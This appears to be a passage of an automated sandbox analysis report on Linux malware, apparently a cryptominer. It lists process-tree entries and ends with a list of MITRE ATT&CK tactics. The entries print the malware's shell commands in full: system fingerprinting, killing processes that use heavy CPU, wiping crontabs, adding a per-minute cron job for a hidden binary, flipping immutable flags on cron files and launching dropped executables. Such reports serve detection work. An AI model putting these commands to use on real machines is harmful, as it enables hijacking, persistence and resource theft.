    PID:4456
- - /usr/sbin/update-rc.d
    update-rc.d pwnrig defaults
    3⤵
    PID:4457

/usr/bin/hostname
hostname -I
1⤵
PID:4315

/usr/bin/awk
awk "{print \$1}"
1⤵
PID:4317

/usr/bin/awk
awk "{print \"-\"\$2}"
1⤵
PID:4322

/usr/bin/head
head -n 1
1⤵
PID:4321

/usr/bin/grep
grep "Port "
1⤵
PID:4320

/usr/bin/cat
cat /etc/ssh/sshd_config
1⤵
PID:4319

/usr/bin/sed
sed -e "s/\$//"
1⤵
PID:4331

/usr/bin/sed
sed -e "s/^ *//"
1⤵
PID:4330

/usr/bin/cut
cut -d: -f2
1⤵
PID:4329

/usr/bin/grep
grep -m 1 "model name" /proc/cpuinfo
1⤵
- Checks CPU configuration
PID:4328

/usr/bin/awk
awk "{print \$1}"
1⤵
PID:4334

/usr/bin/awk
awk "{print \$4}"
1⤵
PID:4337

/usr/bin/awk
awk "{print \$4}"
1⤵
PID:4340

/bin/sh
sh -c "echo \"[\$(hostname=\$(hostname -I 2>/dev/null || hostname -i 2>/dev/null);echo \$hostname | awk {'print \$1'} 2>/dev/null)\$(cat /etc/ssh/sshd_config 2>/dev/null | grep 'Port ' 2>/dev/null | head -n 1 2>/dev/null | awk {'print \"-\"\$2'} 2>/dev/null)][\$(whoami 2>/dev/null)][\$(hostname 2>/dev/null)][\$(grep -c ^processor /proc/cpuinfo 2>/dev/null)][\$(X=\$(grep -m 1 'model name' /proc/cpuinfo 2>/dev/null | cut -d: -f2 2>/dev/null | sed -e 's/^ *//' 2>/dev/null | sed -e 's/\$//' 2>/dev/null); if [ \$(echo \$X 2>/dev/null | awk {'print \$1'} 2>/dev/null) = 'QEMU' ]; then echo 'QEMU'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = '(Haswell)' ]; then echo 'Haswell'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = '(Broadwell)' ]; then echo 'Broadwell'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$3'} 2>/dev/null) = 'CPU' ]; then echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = 'CPU' ]; then echo \$X 2>/dev/null | awk {'print \$3'} 2>/dev/null; elif [ \$(echo \$X 2>/dev/null | awk {'print \$1'} 2>/dev/null) = 'AMD' ]; then echo \$X 2>/dev/null | awk {'print \$2\" \"\$3\" \"\$4'} 2>/dev/null; else echo \$X 2>/dev/null; fi)]\""
1⤵
PID:4680
- /usr/bin/whoami
  whoami
  2⤵
  PID:4691
- /usr/bin/hostname
  hostname
  2⤵
  PID:4692
- /usr/bin/grep
  grep -c "^processor" /proc/cpuinfo
  2⤵
  - Checks CPU configuration
  PID:4693

/usr/bin/hostname
hostname -I
1⤵
PID:4683

/usr/bin/awk
awk "{print \$1}"
1⤵
PID:4685

/usr/bin/awk
awk "{print \"-\"\$2}"
1⤵
PID:4690

/usr/bin/head
head -n 1
1⤵
PID:4689

/usr/bin/grep
grep "Port "
1⤵
PID:4688

/usr/bin/cat
cat /etc/ssh/sshd_config
1⤵
PID:4687

/usr/bin/sed
sed -e "s/\$//"
1⤵
PID:4699

/usr/bin/sed
sed -e "s/^ *//"
1⤵
PID:4698

/usr/bin/cut
cut -d: -f2
1⤵
PID:4697

/usr/bin/grep
grep -m 1 "model name" /proc/cpuinfo
1⤵
- Checks CPU configuration
PID:4696

/usr/bin/awk
awk "{print \$1}"
1⤵
PID:4702

/usr/bin/awk
awk "{print \$4}"
1⤵
PID:4705

/usr/bin/awk
awk "{print \$4}"
1⤵
PID:4708

/bin/sh
sh -c "ps -A -ostat,ppid 2>/dev/null | awk '/[zZ]/ && !a[\$2]++ {print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done;if [ `id -u 2>/dev/null` -eq '0' ]; then ps x 2>/dev/null | grep /etc/cron 2>/dev/null | grep -v grep 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done fi"
1⤵
PID:4709
- /usr/bin/awk
  awk "/[zZ]/ && !a[\$2]++ {print \$2}"
  2⤵
  PID:4711
- /usr/bin/ps
  ps -A "-ostat,ppid"
  2⤵
  - Reads runtime system information
  PID:4710
- /usr/bin/id
  id -u
  2⤵
  PID:4713
- /usr/bin/grep
  grep -v grep
  2⤵
  PID:4716
- /usr/bin/grep
  grep /etc/cron
  2⤵
  PID:4715
- /usr/bin/ps
  ps x
  2⤵
  - Reads runtime system information
  PID:4714

/bin/sh
sh -c "if [ `id -u 2>/dev/null` -eq '0' ]; then ps aux 2>/dev/null | grep -v grep 2>/dev/null | grep -v -- '-bash[[:space:]]*\$' 2>/dev/null | grep -v /usr/sbin/httpd 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done else ps -u `whoami 2>/dev/null` ux | grep -v grep 2>/dev/null | grep -v -- '-bash[[:space:]]*\$' 2>/dev/null | grep -v /usr/sbin/httpd 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done fi"
1⤵
PID:4718
- /usr/bin/id
  id -u
  2⤵
  PID:4719
- /usr/bin/awk
  awk "{if(\$3>30.0) print \$2}"
  2⤵
  PID:4724
- /usr/bin/grep
  grep -v /usr/sbin/httpd
  2⤵
  PID:4723
- /usr/bin/grep
  grep -v -- "-bash[[:space:]]*\$"
  2⤵
  PID:4722
- /usr/bin/grep
  grep -v grep
  2⤵
  PID:4721
- /usr/bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:4720

/bin/sh
sh -c "if [ `id -u 2>/dev/null` -eq '0' ]; then if [ `ps aux 2>/dev/null | grep -v grep 2>/dev/null | grep -- '-bash[[:space:]]*\$' 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | wc -l 2>/dev/null` -gt 1 ]; then ps aux 2>/dev/null | grep -v grep 2>/dev/null | grep -- '-bash[[:space:]]*\$' 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done fi else myid=`whoami 2>/dev/null`; if [ `ps -u \$myid ux 2>/dev/null | grep -v grep 2>/dev/null | grep -- '-bash[[:space:]]*\$' 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | wc -l 2>/dev/null` -gt 1 ]; then ps -u \$myid ux 2>/dev/null | grep -v grep 2>/dev/null | grep -- '-bash[[:space:]]*\$' 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done fi fi"
1⤵
PID:4726
- /usr/bin/id
  id -u
  2⤵
  PID:4727

/usr/bin/wc
wc -l
1⤵
PID:4733

/usr/bin/awk
awk "{if(\$3>30.0) print \$2}"
1⤵
PID:4732

/usr/bin/grep
grep -- "-bash[[:space:]]*\$"
1⤵
PID:4731

/usr/bin/grep
grep -v grep
1⤵
PID:4730

/usr/bin/ps
ps aux
1⤵
- Reads CPU attributes
- Reads runtime system information
PID:4729

/usr/bin/crontab
crontab -r
1⤵
PID:4736

/usr/bin/pkill
pkill -f .klibsystem5
1⤵
- Reads CPU attributes
PID:4737

/usr/bin/pkill
pkill -f .klibsystem4
1⤵
PID:4738

/usr/bin/bash
bash -c "echo \"* * * * * /run/user/.klibsystem5 >/dev/null 2>&1\" | crontab -"
1⤵
PID:4739
- /usr/bin/crontab
  crontab -
  2⤵
  PID:4741

/usr/bin/chattr
chattr -ia /etc/cron.d/.lib-knlib4
1⤵
PID:4742

/usr/bin/chattr
chattr +ia /etc/cron.d/.lib-knlib4
1⤵
PID:4743

/usr/bin/chattr
chattr -ia /var/spool/cron/.lib-knlib4
1⤵
PID:4744

/usr/bin/chattr
chattr +ia /var/spool/cron/.lib-knlib4
1⤵
PID:4745

/usr/bin/chattr
chattr -ia /etc/cron.hourly/.lib-knlib4
1⤵
PID:4746

/usr/bin/chattr
chattr +ia /etc/cron.hourly/.lib-knlib4
1⤵
PID:4747

/usr/bin/chattr
chattr -ia /etc/cron.daily/.lib-knlib4
1⤵
PID:4748

/usr/bin/chattr
chattr +ia /etc/cron.daily/.lib-knlib4
1⤵
PID:4749

/usr/bin/chattr
chattr -ia /etc/cron.weekly/.lib-knlib4
1⤵
PID:4750

/usr/bin/chattr
chattr +ia /etc/cron.weekly/.lib-knlib4
1⤵
- Attempts to change immutable files
PID:4751

/usr/bin/chattr
chattr -ia /etc/cron.monthly/.lib-knlib4
1⤵
- Attempts to change immutable files
PID:4752

/usr/bin/chattr
chattr +ia /etc/cron.monthly/.lib-knlib4
1⤵
PID:4753

/usr/bin/chattr
chattr -ia /etc/anacrontab
1⤵
PID:4754

/usr/bin/chattr
chattr +ia /etc/anacrontab
1⤵
PID:4755

/tmp/sys-helper
/tmp/sys-helper
1⤵
- Executes dropped EXE
- Writes file to tmp directory
PID:4756

/tmp/service-agent
/tmp/service-agent -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d -pwn
1⤵
- Executes dropped EXE
- Checks CPU configuration
- Checks hardware identifiers (DMI)
- Reads CPU attributes
- Reads hardware information
- Enumerates kernel/hardware configuration
PID:4757
- /bin/sh
  sh -c "echo \"[\$(hostname=\$(hostname -I 2>/dev/null || hostname -i 2>/dev/null);echo \$hostname | awk {'print \$1'} 2>/dev/null)\$(cat /etc/ssh/sshd_config 2>/dev/null | grep 'Port ' 2>/dev/null | head -n 1 2>/dev/null | awk {'print \"-\"\$2'} 2>/dev/null)][\$(whoami 2>/dev/null)][\$(hostname 2>/dev/null)][\$(grep -c ^processor /proc/cpuinfo 2>/dev/null)][\$(X=\$(grep -m 1 'model name' /proc/cpuinfo 2>/dev/null | cut -d: -f2 2>/dev/null | sed -e 's/^ *//' 2>/dev/null | sed -e 's/\$//' 2>/dev/null); if [ \$(echo \$X 2>/dev/null | awk {'print \$1'} 2>/dev/null) = 'QEMU' ]; then echo 'QEMU'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = '(Haswell)' ]; then echo 'Haswell'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = '(Broadwell)' ]; then echo 'Broadwell'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$3'} 2>/dev/null) = 'CPU' ]; then echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = 'CPU' ]; then echo \$X 2>/dev/null | awk {'print \$3'} 2>/dev/null; elif [ \$(echo \$X 2>/dev/null | awk {'print \$1'} 2>/dev/null) = 'AMD' ]; then echo \$X 2>/dev/null | awk {'print \$2\" \"\$3\" \"\$4'} 2>/dev/null; else echo \$X 2>/dev/null; fi)]\""
  2⤵
  PID:4758
- - /usr/bin/whoami
    whoami
    3⤵
    PID:4769
- - /usr/bin/hostname
    hostname
    3⤵
    PID:4770
- - /usr/bin/grep
    grep -c "^processor" /proc/cpuinfo
    3⤵
    - Checks CPU configuration
    PID:4771

/usr/bin/hostname
hostname -I
1⤵
PID:4761

/usr/bin/awk
awk "{print \$1}"
1⤵
PID:4763

/usr/bin/awk
awk "{print \"-\"\$2}"
1⤵
PID:4768

/usr/bin/head
head -n 1
1⤵
PID:4767

/usr/bin/grep
grep "Port "
1⤵
PID:4766

/usr/bin/cat
cat /etc/ssh/sshd_config
1⤵
PID:4765

/usr/bin/sed
sed -e "s/\$//"
1⤵
PID:4777

/usr/bin/sed
sed -e "s/^ *//"
1⤵
PID:4776

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

Persistence

Boot or Logon Autostart Execution

Hijack Execution Flow

Scheduled Task/Job

Privilege Escalation

Boot or Logon Autostart Execution

Hijack Execution Flow

Scheduled Task/Job

Defense Evasion

Hijack Execution Flow

Virtualization/Sandbox Evasion

Credential Access

Discovery

System Information Discovery

Virtualization/Sandbox Evasion